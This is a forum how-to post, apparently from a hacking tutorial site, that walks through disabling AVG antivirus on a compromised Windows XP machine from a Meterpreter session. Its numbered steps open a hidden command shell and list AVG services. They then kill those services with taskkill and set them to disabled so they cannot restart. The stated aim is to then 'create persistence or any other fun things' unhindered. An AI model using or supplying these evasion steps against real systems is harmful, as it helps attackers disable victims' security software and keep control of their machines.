How To: Disable Anti Virus Services After Got Meterpreter Session on Remote PC.

Disable Anti Virus Services After Got Meterpreter Session on Remote PC.

Hello Friends …

My name is Suresh Senarathna and this is my first "How-To" post,
Now I am going to show you how to stop all antivirus services after got meterpreter session in your victim,

(I'm using MS windows Xp as my victim OS and AVG Antivirus guard as an example)

In meterpreter session we can use "killav" command to kill AVG services which running in victim's PC, but it will not stop all running services of AVG ,

So we going to use "taskkill" command to stop all ruining avg services,

1) First type:

execute –f cmd.exe –c –H

In meterpreter terminal , it will execute hidden cmd on our victim OS.

then type,

interact n

(n=channel number) to interact with it.

2) Then type:

tasklist /SVC | find /I "avg"

to find what are the running AVG services.

3) After it type:

taskkill /F /IM "avg"

to kill those running services,

But as you can see all those services are not terminated, because some of them are restart itself and those are unable to stop,

4) To verify it type:

sc queryex (service name)

5) So we had to stop those services auto-starting do that, type:

sc config (service name) start=disabled

6) Then do taskkill again,

taskkill /F /IM "avg"*

7) Finally type:

tasklist /SVC | find /I "avg"

to verify all avg services are terminated….

Now all the running and auto-starting AVG services are terminated.

So you can create persistence or any other fun things with out having any antivirus guard problem,

(P.S : is any thing I have done wrong way plz correct me, thanks for reading)

Want to start making money as a white hat hacker? Jump-start your hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from cybersecurity professionals.

Buy Now (90% off) >

Other worthwhile deals to check out:

Join the Next Reality AR Community

Get the latest in AR — delivered straight to your inbox.


You... don't need admin privileges?

When he launched the cmd.exe, it's pointing directly into the windows/system32 , so I think he used a high integrity process meterpreter.

Share Your Thoughts

  • Hot
  • Latest